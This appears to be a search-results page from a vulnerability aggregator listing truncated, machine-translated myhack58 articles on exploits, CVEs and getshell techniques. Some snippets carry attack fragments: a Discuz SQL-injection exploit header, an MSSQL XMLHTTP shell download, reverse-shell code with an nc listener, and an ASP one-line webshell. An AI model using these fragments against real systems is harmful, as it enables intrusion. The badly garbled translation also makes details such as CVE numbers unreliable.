Lucene search
K
Myhack58Most viewed

7620 matches found

myhack58
myhack58
added 2019/04/25 12:0 a.m.58 views

With Yahoo and Paypal is related to two distinct vulnerabilities-vulnerability warning-the black bar safety net

! This article share with Yahoo and Paypal is related to two unique vulnerability, one for Yahoo IDOR vulnerability insecure direct object references, another for Paypal, DoS vulnerabilities, two vulnerabilities found are for the Indian security engineers, which found that principles and ideas ar...

6.9AI score
Exploits0
myhack58
myhack58
added 2019/04/22 12:0 a.m.58 views

A single click to achieve remote code execution: content management framework Drupal malicious image upload exploit chain analysis-vulnerability warning-the black bar safety net

Overview Recently, Drupal has released a set for the 7. x and 8. x version key patch. In the update, contains a set of vulnerabilities fix the vulnerabilities is our initial participation in the for the target of the vulnerability incentive program when submitted. These vulnerabilities can achiev...

0.2AI score
Exploits0
myhack58
myhack58
added 2018/12/18 12:0 a.m.58 views

See how I through nodejs in the SSRF full control of the aws-vulnerability warning-the black bar safety net

This is me at hackerone on a private vulnerability bonus program found a loophole, found that the use of and write the report it took me 12 and a half hours, without a break. Through this loophole, I can get to the AWS credentials, I can be completely invaded the company's Account: I now have 20...

7.2AI score
Exploits0
myhack58
myhack58
added 2018/04/24 12:0 a.m.58 views

Router vulnerability reproduce the analysis of the fourth bomb: CVE-2018-7034-vulnerability warning-the black bar safety net

TrendNET router permission bypass vulnerability, an attacker by setting$AUTHORIZEDGROUP = 1 to bypass permission verification Vulnerability reference information:https://blogs. securiteam. com/index. php/archives/3627 The affected version of the router TEW-751DR – v1. 03B03 TEW-752DRU – v1. 03B01...

7.6AI score0.02068EPSS
Exploits1
myhack58
myhack58
added 2017/03/29 12:0 a.m.58 views

Oracle knowledge management system XXE vulnerability analysis: can lead to RCE-vulnerability warning-the black bar safety net

A vulnerability summary This article on the Oracle knowledge management system 8. 5. 1 announcements content analysis. Oracle's InQuira knowledge management products with the various sources of search technology, provides users with easy and convenient access to knowledge method, the knowledge of...

Exploits0
myhack58
myhack58
added 2016/10/19 12:0 a.m.58 views

CVE-2 0 1 6-4 9 7 7: RCE in Spring Security Oauth vulnerability analysis-vulnerability warning-the black bar safety net

Version affected Pivotal Spring Security OAuth 2.0 – 2.0.9 Pivotal Spring Security OAuth 1.0 – 1.0.5 Background A few months ago, I for one use Spring Security OAuth framework for authorization of the Web application were tested. In my research, I discovered some issues, including remote code...

0.79176EPSS
Exploits1
myhack58
myhack58
added 2016/05/11 12:0 a.m.58 views

From 0 to TrustZone in the second article: the QSEE mention the right vulnerability and the use of CVE-2 0 1 5-6 6 3 9-a vulnerability warning-the black bar safety net

! In this article, we discuss how to find and exploit a vulnerability, access to Qualcomm secure execution environmentQSEEof the code execute permissions. Related reading From 0 to TrustZone first article: explore the high-pass SEE safe executable environment QSEE attack surface In a previous...

0.3AI score
Exploits0
myhack58
myhack58
added 2015/05/24 12:0 a.m.58 views

Logjam attacks-the new encryption bug affects a large number of users-bug warning-the black bar safety net

Diffie-Hellman key exchange technology is one of the popular encryption algorithm which allows the Internet Protocol uses a shared key and a secure link. It is a multi-Protocol based including HTTPS, SSH, IPsec, SMTPS and some rely on the TLS Protocol. We have found a number of Diffie-Hellman key...

0.6AI score
Exploits0
myhack58
myhack58
added 2015/03/15 12:0 a.m.58 views

Cheetah wifi under a non-certified remote control PC power off, lock-screen-vulnerability warning-the black bar safety net

Brief description: In the computer open the Cheetah WiFi hotspot, a feature is a remote control computer shutdown and lock screen, found that authentication only by mac address binding, can be fake mac address to bypass authentication Detailed description: ! 1418485757111276.jpg wireshark packet...

0.6AI score
Exploits0
myhack58
myhack58
added 2014/07/04 12:0 a.m.58 views

Discuz! 7.2 SQL injection exp(getshell Edition-vulnerability warning-the black bar safety net

? php / @author: xiaoma @blog : www.i0day.com @date : 2014.7.2 2 3:1 / errorreporting0; settimelimit3 0 0 0; $host=$argv1; $path=$argv2; $js=$argv3; $timestamp = time+1 03 6 0 0; $table=”cdb”;//table name if $argc 2 printr‘ Discuz faq.php SQL Injection Exp ---By: A Www.i0day.com---- Usage: php ‘....

0.4AI score
Exploits0
myhack58
myhack58
added 2014/04/26 12:0 a.m.58 views

rsync infinite loop denial of service vulnerability-vulnerability warning-the black bar safety net

Affected system: rsync rsync 3.1.0 Description: CVECAN ID: CVE-2 0 1 4-2 8 5 5 rsync is a fast incremental file transfer tool that is used in the same host the backup inside the backup. rsync 3.1.0, and other versions in the"checksecret"functionauthenticate. cmemory in a logic error, which may...

7.8CVSS0.2AI score0.04086EPSS
Exploits1
myhack58
myhack58
added 2014/02/11 12:0 a.m.58 views

Friends network queries QQ number of vulnerability-vulnerability warning-the black bar safety net

Brief description: By fixing the code friends network seconds check the QQ number. Detailed description: By extracting the friends network feature code, plus a string of fixed code. Both can seconds to detect each other's QQ space. That QQ number of natural to be informed. Criminals if through th...

0.7AI score
Exploits0
myhack58
myhack58
added 2014/01/13 12:0 a.m.58 views

Discuz use UC_KEY be getshell-a vulnerability warning-the black bar safety net

From:http://www. tick. org/bugs/tick-2 0 1 4-0 4 8 1 3 7 ? php // Code copyright belongs to the original author all! $timestamp = time+1 03 6 0 0; $host="127.0.0.1"; $uckey="eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5waofq6j285ca33i151e551g0l9f2l3dd";...

7.3AI score
Exploits0
myhack58
myhack58
added 2013/04/24 12:0 a.m.58 views

xiuno bbs Forum background code execution Getshell vulnerabilities attached to the use of the method-vulnerability warning-the black bar safety net

Official description: Xiuno the name comes from the Saint Seiya Aries gold Saint Seiya Shura, his attack speed and combat effectiveness is zodiac the strongest, he is the speed and power of the incarnation; in the Buddhist inside, Shura is a six Channel One, in the humanity and heaven, between,...

7.3AI score
Exploits0
myhack58
myhack58
added 2013/04/02 12:0 a.m.58 views

XYCMS law firm built Station system injection vulnerability-vulnerability warning-the black bar safety net

Preface: just ass boring download the audit the next,slightly looked down, the vulnerabilities too much. ps: with a contribution of plate articles is somewhat similar Lustful dividing line -------------------------------------------------------- Audit version: XYCMS law firm built Station system...

1.5AI score
Exploits0
myhack58
myhack58
added 2012/07/16 12:0 a.m.58 views

ShyPost enterprise web site management system V4. 3 injection, XSS vulnerabilities and the background to get webshell-vulnerability warning-the black bar safety net

Author: invincible gold record administration Program source code Download:http://www. codefans. net/down/1 7 0 0 2. shtml ① Injection vulnerability ② BackgroundXSSvulnerability ③ The editor vulnerability to get webshell ① Injection vulnerability 1. Vulnerability file: Aboutus. asp % !– include...

0.3AI score
Exploits0
myhack58
myhack58
added 2009/07/16 12:0 a.m.58 views

xml. http download get SHELL-vulnerability warning-the black bar safety net

Excerpts from: hi.baidu.com/systemexp Note the following statement in SA under the purview of the Executive, for N more extended stored procedure is deleted when using the best results. DECLARE @B varbinary8 0 0 0, @hr int, @http INT, @down INT EXEC spoacreate Microsoft. XMLHTTP,@http output ;EXE...

0.1AI score
Exploits0
myhack58
myhack58
added 2009/01/11 12:0 a.m.58 views

linux rally the shell-vulnerability warning-the black bar safety net

include include include include include include include void usage; char shell="/bin/sh"; char message="s8s8 welcome\n"; int sock; int mainint argc, char argv ifargc \n", prog; exit-1; gcc-o f f. c Then on the machine listening on a port nc-l-p 8 8 8 8 Then execute./ f 192.168.1.14 8 8 8 8 Note:...

0.7AI score
Exploits0
myhack58
myhack58
added 2008/01/29 12:0 a.m.58 views

How to bypass the QQ Doctor of killing-vulnerability warning-the black bar safety net

Magic school Roger to his classmates demonstrates his newly acquired black magic, remote install Blackhole Trojan, Blackhole Trojan is the QQ Doctor of killing, only to see him read the sentence spell, again, remote install Blackhole Trojan, in this case the QQ doctor without any reaction, like...

7.5AI score
Exploits0
myhack58
myhack58
added 2019/03/08 12:0 a.m.57 views

Windows domain environment there is a remote code execution risk early warning-vulnerability warning-the black bar safety net

0x00 event background Recently, 360CERT monitoring to the foreign security researchers disclosed a Windows domain environment pose a serious threat to attack the use of the programme, for the man in the middle attacks with the use of resource constrained delegation attack of a combination of ways...

1.2AI score
Exploits0
myhack58
myhack58
added 2017/09/11 12:0 a.m.57 views

Struts2 new flaws vulnerability bug(S2-052 presents the use case, and face the vulnerability flaws of the enterprise-the race against time-vulnerability warning-the black bar safety net

Prior to the black bar safety net it S2-052)vulnerabilities done in a special thematic report, I believe we also have understand! Recently from the Cisco Talos experimental study of the analysis chamber and NVISO laboratory for the research staff also found that there was an attacker of real use ...

7.2AI score
Exploits0
myhack58
myhack58
added 2017/03/22 12:0 a.m.57 views

The Japanese version of the WPS remote code execution vulnerability detailed analysis-vulnerability warning-the black bar safety net

Word processing and work product in the vulnerability is the threat actors to exploit the useful target. Users often encounter in everyday life these software packages use the file type, and may in the email to open such a file, or be prompted to download from the website this file does not produ...

7.5CVSS9.6AI score0.01889EPSS
Exploits1
myhack58
myhack58
added 2016/12/27 12:0 a.m.57 views

Based on the Chakra JIT-CFG to bypass the technology-vulnerability warning-the black bar safety net

In this article, we will to introduce the reader in to attack Internet Explorer and the Edge browser can be used to bypass Microsoft's control flow protection of the CFG of the method. Our previous proof-of-concept nature of the exploit code is covered by the object's function pointers to achieve...

7AI score
Exploits0
myhack58
myhack58
added 2015/12/08 12:0 a.m.57 views

LuManager high-risk SQL injection 0day analysis-vulnerability warning-the black bar safety net

2 0 1 5 year 9 month 7 day Ali cloud shield situational awareness system captures the LuManager system of 0day a gold that confirmed that the vulnerabilities once a hacker can use directly to the highest authority of the login background, upload webshell, the control system database, the operatio...

0.2AI score
Exploits0
myhack58
myhack58
added 2015/04/20 12:0 a.m.57 views

IIS 7 HTTP. sys vulnerability in-depth analysis-vulnerability warning-the black bar safety net

http. sys vulnerability range As the parties in-depth analysis, across a domain managed by Windows HTTP. sys vulnerability of the case is gradually surfaced. Yesterday's announcement of the information mentioned in the Http. sys is a Microsoft Windows processing the HTTP request the kernel driver...

Exploits0
myhack58
myhack58
added 2012/10/12 12:0 a.m.57 views

LIVCMS content management system for the presence of injection vulnerabilities-vulnerability warning-the black bar safety net

Brief description: This program is used for Network Media the earth above the TV, 程序目录dealfunc下commentstat.php和commentjs.php that The cmid does not do filtering. A direct result of the injection. Background the default address for http://cp.xxxx.com/ws Detailed description: commentstat. php file...

7.7AI score
Exploits0
myhack58
myhack58
added 2009/07/28 12:0 a.m.57 views

metasploit autopwn with mysql simple version of the [shadow-T-write]-vulnerability warning-the black bar safety net

Before according to the foreign method, although able to successfully run the autopwn,but set up ash is often in trouble right now according to their own summary of the simple method, stick out a detailed set up steps. First, we find creating a data table of the sql file...

7.5AI score
Exploits0
myhack58
myhack58
added 2009/06/01 12:0 a.m.57 views

ASPX a word of the script the horse detailed analysis-vulnerability warning-the black bar safety net

Source: evil octal First recall before the ASP Word of the classic Trojan! %if request"nonamed""" then execute request"nonamed"% VBS execute is dynamic running the specified code and JSCRIPT also have the eval function can be achieved,that is ASP word the Trojan also has a version is the use of...

7.8AI score
Exploits0
myhack58
myhack58
added 2008/01/06 12:0 a.m.57 views

Overwrite the SEH overflow exploit detection ideas-vulnerability warning-the black bar safety net

See Security focus on a review of the stack-based fingerprint detecting a buffer overflow of some ideas, which is in the ShellCode is already running in its call stackis Hook the sub calls the function LoadLibraryis detected, some use an overflow overwriting the SEH Handler, and then any programs...

0.2AI score
Exploits0
myhack58
myhack58
added 2005/12/31 12:0 a.m.57 views

Using the WebShell to achieve DDOS attack-vulnerability warning-the black bar safety net

Believe some black friends haven't playedDDOSit, whether WebShell lot, you know WebShell also able to achieve a DDdos? Know the big scare, don't watch, this is the rookie tutorial lonely sword Saint not a hacker master, can only write newbie tutorials! in. First you the WebShell to be uploaded fi...

0.1AI score
Exploits0
myhack58
myhack58
added 2005/10/21 12:0 a.m.57 views

Use SMBCrack to crack the remote-host admin-password-vulnerability warning-the black bar safety net

SMBCrack for stream light 5 development of test prototype, and the conventional SMB shared violent hack tool, not using the system API, but the use of the SMB Protocol. Windows 2 0 0 0 can be in the same session for multiple password probe. Use SMBCrack crack the remote host administrator passwor...

0.6AI score
Exploits0
myhack58
myhack58
added 2019/01/24 12:0 a.m.56 views

CVE-2019-3462: apt/apt-get remote code execution vulnerability alerts-a vulnerability alert-the black bar safety net

0x00 vulnerability background 2019 1 May 22, @Max Justicz in his blog is disclosed about the debian-based package Manager apt/apt-get remote code execution in some detail. When by APT for any software installation, update, etc., the default will be to go HTTP instead of HTTPS, an attacker can MiT...

0.14555EPSS
Exploits0
myhack58
myhack58
added 2018/12/23 12:0 a.m.56 views

CVE-2018-20129: DedeCMS V5. 7 SP2 front Desk file upload getshell vulnerability alerts-a vulnerability alert-the black bar safety net

2018-12-11 in CVE Chinese application station published a DEDECMS 5.7 SP2 is the latest version there is a file upload vulnerability, with administrator privileges can exploit this vulnerability to upload and getshell execute arbitrary PHP code. After analysis and verification. The vulnerability...

0.3AI score0.08226EPSS
Exploits1
myhack58
myhack58
added 2017/10/10 12:0 a.m.56 views

dnsmasq:exposure out of the plurality of levels is quite high vulnerability-vulnerability warning-the black bar safety net

dnsmasq as a lightweight DNS and DHCP do, thanks to its simple and easy to use, in the SME case, and the Cloud Platform is widely used, contains libvirt, etc., component the YAP indirect application of it as a support. 2017 10 on 2 September, by Google safe team invention, a plurality of dnsmasq...

8.5AI score0.93307EPSS
Exploits32
myhack58
myhack58
added 2017/08/03 12:0 a.m.56 views

Shenzhen, China, a manufacturer of smart cameras exposed vulnerability: at least 17.5 million devices can be remote attack-vulnerability warning-the black bar safety net

Security firms Bitdefender and Checkmarx are released report, security researcher at a plurality of conventional smart cameras found in a remote intrusion vulnerability, relates to the VStarcam, the Loftek, as well as Neo IP camera. One of Neo IP camera is Shenzhen, China manufacturer beautiful...

0.2AI score
Exploits0
myhack58
myhack58
added 2017/05/18 12:0 a.m.56 views

Joomla! 3.7 Core SQL injection (CVE-2017-8917)vulnerability analysis-vulnerability warning-the black bar safety net

Author: p0wd3r know Chong Yu 404 security lab Date: 2017-05-18 0x00 vulnerability overview Vulnerability description Joomla to 5 on 17 May released the new version 3. 7. 1, of this update fixes a high-riskSQL injectionvulnerability to successfully exploit the vulnerability an attacker can...

0.99826EPSS
Exploits21
myhack58
myhack58
added 2016/11/24 12:0 a.m.56 views

Fuzzing Android: tap the Android system components components of vulnerability-vulnerability warning-the black bar safety net

Full-text overview This article focuses on one can be used to find Android system components in the different types of vulnerability fuzzing method. This article describes a General purpose vulnerability discovery method, and he is how applications on Android platform. The following is a has been...

7.1AI score
Exploits0
myhack58
myhack58
added 2016/10/18 12:0 a.m.56 views

The use of hardware defense against ROP: HA-CFI technical analysis-vulnerability warning-the black bar safety net

0x00 Preface With vulnerability mitigation technology continues to evolve, some common exploit tools such as ROP becomes more and more difficult, from ENDGAME Cody Pierce published an articlethe blog, saying that the ROP of Doom has arrived, the new vulnerability mitigation techniques for the...

7.2AI score
Exploits0
myhack58
myhack58
added 2016/07/13 12:0 a.m.56 views

Struts2 exploits tool Devmode version released with the source code-the vulnerabilities and early warning-the black bar safety net

! Disclaimer: This tool is for security testing purposes, the prohibition of the illegal use. Please pay attention and check the tool Safety. When Struts2 turn on devMode mode, will lead to a serious remote code execution vulnerability. If the WebService to start a permission is the highest...

0.6AI score
Exploits0
myhack58
myhack58
added 2016/03/02 12:0 a.m.56 views

Android version of Baidu browser remote code execution vulnerability analysis-vulnerability warning-the black bar safety net

! A few weeks ago, I was in the Baidu Android browser, found a remote code execution vulnerability. Initially I wanted to at this year's Infiltrate on about this subject until I see the following XDA developers weekend published articles. Overview The above article discusses the Citizen Lab...

0.1AI score
Exploits0
myhack58
myhack58
added 2015/09/04 12:0 a.m.56 views

By overflow vulnerability to bypass the antivirus protection-vulnerability warning-the black bar safety net

Ideas By writing a having overflow vulnerability in the program, and the malicious code written into the shellcode, overflow after executing the shellcode can bypass the antivirus protection. Test environment Platform: Windows XP SP3 Compiler: VC 6.0 Test code Construct the following exploit code...

0.7AI score
Exploits0
myhack58
myhack58
added 2015/07/30 12:0 a.m.56 views

Pupils with EasyFuzzer 1.0 mining software vulnerabilities-vulnerability warning-the black bar safety net

EasyFuzzer is a new fuzzing tool. Currently only supports the file format of the fuzzy test. Features: easy, streamlined, efficient, and intelligent. Easy: very easy to use, does not need any configuration. With his elementary students can also dig vulnerability, don't worry there is no 0day...

7.4AI score
Exploits0
myhack58
myhack58
added 2015/04/16 12:0 a.m.56 views

IIS remote code execution vulnerability, CVE-2 0 1 5-1 6 3 5-the vulnerability warning-the black bar safety net

In Microsoft 4 on 1 4, patch released the patch, there is one for the IIS server remote code execution vulnerability hazard is very large, please the majority of users attention. Vulnerability information A remote code execution vulnerability exists in the HTTP Protocol stack HTTP.sys, when the...

2AI score
Exploits0
myhack58
myhack58
added 2014/05/21 12:0 a.m.56 views

CVE-2 0 1 3-4 5 4 7 Nginx parsing vulnerability in-depth use and analysis-vulnerability warning-the black bar safety net

0x00 background Nginx historically there have been many times parsing vulnerability, such as 80sec found parsing vulnerability, as well as the extension directly after add%0 0 truncation lead to code execution resolves vulnerabilities. But in 2 0 1 3 year-end, nginx again broke Vulnerability, CVE...

7.7AI score
Exploits0
myhack58
myhack58
added 2014/04/26 12:0 a.m.56 views

Cacti cross-site request forgery Vulnerability, CVE-2 0 1 4-2 3 2 7-the vulnerability warning-the black bar safety net

Affected system: Cacti Cacti 0.8.8 b Cacti Cacti 0.8.7 f Description: BUGTRAQ ID: 6 6 3 9 2 CVECAN ID: CVE-2 0 1 4-2 3 2 7 Cacti is a round Robin database, RRD tool, you can help from the database information to create a graphic, there are multiple Linux versions. Cacti 0.8.8 b and earlier versio...

6.8CVSS0.9AI score0.02278EPSS
Exploits1
myhack58
myhack58
added 2014/02/15 12:0 a.m.56 views

Discuz! X upgrade/conversion program GETSHELL vulnerability analysis-vulnerability warning-the black bar safety net

0x01 vulnerability analysis Vulnerability root cause in the code comment appears in the wrap, resulting in code execution, the process is as follows: 0x0101 first, from the index. php the 3 row 0 with into. ! enter image description here 0x0102 doconfiginc. php 3, line 7, with the into this...

0.2AI score
Exploits0
myhack58
myhack58
added 2013/12/24 12:0 a.m.56 views

Discuz! x-Series conversion tool any to write code that vulnerability-vulnerability warning-the black bar safety net

Discuz! x-Series conversion tools exist to any code written to exploit, tick on the pig man and also a great brush rank also brush almost, today know that there are children's shoes has been announced! so, the release of prior learning python to write of the exploits exp, just to practice hand...

7.5AI score
Exploits0
myhack58
myhack58
added 2011/06/09 12:0 a.m.56 views

discuz! 7.2 manyou plug-in storm path and Get Webshell-vulnerability warning-the black bar safety net

| In the latest discuz! 7.2 comes with a new application plug-manyou is. Precisely in this new plug-in, not the incoming parameters check in GPC is off the case, leading to injection vulnerabilities. Vulnerability analysis: File:./ manyou/sources/notice.php The relevant code: | The following is...

0.3AI score
Exploits0
myhack58
myhack58
added 2011/05/17 12:0 a.m.56 views

Win32k. sys keyboard layout file to mention the right vulnerability analysis-vulnerability warning-the black bar safety net

Author: Sebastien Renaud Translator: riusksk(springs brother: the http://riusksk.blogbus.com) This article will give you shed some light on the Stuxnet Virus the technical details, mainly aimed at the about the author is how to use 0day vulnerabilities to achieve code versatility. Discussed below...

6.8AI score
Exploits0
myhack58
myhack58
added 2010/11/26 12:0 a.m.56 views

WSN Links SQL injection vulnerability-vulnerability warning-the black bar safety net

WSN Links is an advanced PHP-based/MySQL search script, WSN Links 6.0.1, 5.1.51;, 5.0.81 version of the search. php file existsSQL injectionvulnerabilities that could lead to sensitive information disclosure. +info: 'WSN Links' SQL Injection Vulnerability CVE-2 0 1 0-4 0 0 6 Mark Stanislav -...

7.5CVSS6.9AI score0.01145EPSS
Exploits6
Total number of security vulnerabilities5000